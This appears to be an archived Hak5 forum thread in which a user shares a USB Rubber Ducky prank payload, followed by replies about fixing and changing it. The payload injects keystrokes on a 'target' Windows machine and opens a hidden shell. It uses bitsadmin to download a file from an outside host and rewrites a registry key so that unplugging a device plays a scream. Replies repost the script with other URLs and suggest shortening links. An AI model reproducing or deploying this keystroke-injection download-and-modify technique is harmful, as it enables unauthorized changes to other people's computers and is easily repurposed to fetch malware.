Jump to content

[PAYLOAD] Making Windows scream when you unplug devices

Korben

By Korben
in Classic USB Rubber Ducky

Recommended Posts

Korben Grand Master

Korben

Posted
Posted

I'm sure everyone at some point in their life has unplugged something from a Windows machine and heard the notification sound. 

This is obviously way too robotic and lifeless for my taste; here is a ducky payload that will replace device disconnect sounds with a scream.

Just in case you want it to feel like a living thing that is suffering as you rip parts off of it.

Inspiration from watching too much Michael Reeves. 


Requires internet access on the target Windows host; this is just the shortest/fastest way to drop this kind of payload. Other staging/injection techniques could be used to supplement the download.


This will open run and execute the .wav download and registry changes in the background. Give it a couple of seconds to download. The change should be made by the time you remove the ducky from the target. 

DELAY 3000
GUI r
DELAY 350
STRING cmd /C "start /MIN cmd /C bitsadmin.exe /transfer 'e' http://h4k.cc/s.wav %USERPROFILE%\s.wav&&@reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current\ /t REG_SZ /d %USERPROFILE%\s.wav /f"
ENTER

This downloads a sample .wav (Doom). Replace the above url with another that hosts the desired .wav if you want to change the sound.

Encode your payload using PayloadStudio here: https://payloadstudio.hak5.org
 

Link to comment
Share on other sites
Just_a_User Newbie

Just_a_User

Posted
Posted
5 hours ago, cuckkoo said:

so i will try finding a audio file having short url or maybe you could host it!

You could also try using a link shortening service to make any long link much smaller.

Link to comment
Share on other sites
UMBR4 Newbie

UMBR4

Posted
Posted

Just got my first rubber ducky. Copied this payload to it and changed the layout to spanish (that's the languaje of the target computer), it seems like the payload runs, but nothing happens. Why could this be?

Link to comment
Share on other sites
  • 3 weeks later...
cyleja1234 Newbie

cyleja1234

Posted
Posted

it download the link and everything but when I take out my use and even eject it it dose not do anything...?

What is wrong?
Also I edited it to after this haha
CODE: 

DELAY 3000 
GUI r 
DELAY 350
cmd /C "start /MIN cmd /C bitsadmin.exe /transfer 'e' https://s0.vocaroo.com/media/download_temp/Vocaroo_s0tXZkNTbgtC.mp3 %USERPROFILE%\s.wav&&@reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps.Default\DeviceDisconnect.Current\ /t REG_SZ /d %USERPROFILE%\s.wav /f"
ENTER
Link to comment
Share on other sites
cyleja1234 Newbie

cyleja1234

Posted
Posted
On 6/7/2019 at 12:38 AM, cyleja1234 said:

it download the link and everything but when I take out my use and even eject it it dose not do anything...?

What is wrong?
Also I edited it to after this haha
CODE: 


DELAY 3000 
GUI r 
DELAY 350
cmd /C "start /MIN cmd /C bitsadmin.exe /transfer 'e' https://s0.vocaroo.com/media/download_temp/Vocaroo_s0tXZkNTbgtC.mp3 %USERPROFILE%\s.wav&&@reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps.Default\DeviceDisconnect.Current\ /t REG_SZ /d %USERPROFILE%\s.wav /f"
ENTER

 ifound it out it was becasue it needed to be a wav and I did not change any other this like s.wav to the file name.

Link to comment
Share on other sites
  • 4 months later...
CyCO007 Newbie

CyCO007

Posted
Posted
On 5/9/2019 at 12:00 PM, Korben said:

I'm sure everyone at some point in their life has unplugged something from a Windows machine and heard the notification sound. 

This is obviously way too robotic and lifeless for my taste; here is a ducky payload that will replace device disconnect sounds with a scream.

Just in case you want it to feel like a living thing that is suffering as you rip parts off of it.

Inspiration from watching too much Michael Reeves. 


Requires internet access on the target Windows host; this is just the shortest/fastest way to drop this kind of payload. Other staging/injection techniques could be used to supplement the download.


This will open run and execute the .wav download and registry changes in the background. Give it a couple of seconds to download. The change should be made by the time you remove the ducky from the target. 


DELAY 3000
GUI r
DELAY 350
STRING cmd /C "start /MIN cmd /C bitsadmin.exe /transfer 'e' http://h4k.cc/s.wav %USERPROFILE%\s.wav&&@reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current\ /t REG_SZ /d %USERPROFILE%\s.wav /f"
ENTER

This downloads a sample .wav (Doom). Replace the above url with another that hosts the desired .wav if you want to change the sound.

Fastest way to encode this would be using our single file JS Duck Encoderhttps://downloads.hak5.org/ducky
 

 

Link to comment
Share on other sites
CyCO007 Newbie

CyCO007

Posted
Posted

LOL  i love this prank it really dives right in to memory recall of the windows 98 .reg or  regedit to the msconfig days changing wallpapers of desktop screenshots.  n e won remember win98plus  where utopia sounds and robot sounds made windows seem like a hightech computer lyyke dat movie edward furlong was in "BrainScan"  many many disturbing middle school resses breaks mimicing that limp.   I actually got "Dragon Natural Speaking so I could control the puter with my MIC"  yeah i know lame;  at least I could tell it to call people hands free while sumonning that rock n roll demon from the movie lol

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...